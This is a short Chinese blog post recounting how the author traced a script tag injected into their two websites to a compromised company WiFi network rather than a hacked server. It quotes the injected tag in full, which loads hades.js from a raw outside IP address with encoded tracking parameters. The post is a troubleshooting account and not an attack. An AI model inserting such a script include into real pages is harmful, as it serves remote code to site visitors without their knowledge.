本文记述了一个关于网站被黑客注入恶意代码的经历,并详细解释了如何排查问题根源,最终发现是公司WiFi遭到攻击而非服务器被黑的过程。
检查页面发现最底部被添加了一段代码
<script id="bdn27wkwcmq0q056pvs57jp10vml?ac=00%3Af3%3Ad2%3A10%3A00%3A2a&freq=noband&hades=&shopId=noband" src="http://114.55.181.105/js/hades.js?data=PvCGznoUwVB2WRLrZdSDONRpTVekZrMSqw%2B8DSX%2FRasZzDUdda41W9x1FFDIxyEnJLBuxEsgM11%2BCziWMgHUPPlJ1RTsFVT8nfbtA2usCYraGEP3"></script>开始怀疑网站被黑,可是阿里云并没有报警,然后我在想是不是代码哪里写的不安全被xxs了,
然后删除了网站的可能会引起漏洞的phpinfo.php文件
查了半天没找到原因,网上的回答也很少。
然后我突然想是不是wifi被黑了, 可是我打开别的网站是好的啊,为啥偏偏我自己的两个网站(分别在不同的服务器上)都被注入了代码。
然后又是查找自身原因,实在找不到 ,我想要不把wifi关掉 用手机3G上网,果然发现网站注入的代码消失了,所以果然尼玛不是服务器被黑,而是公司的wifi被黑了。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
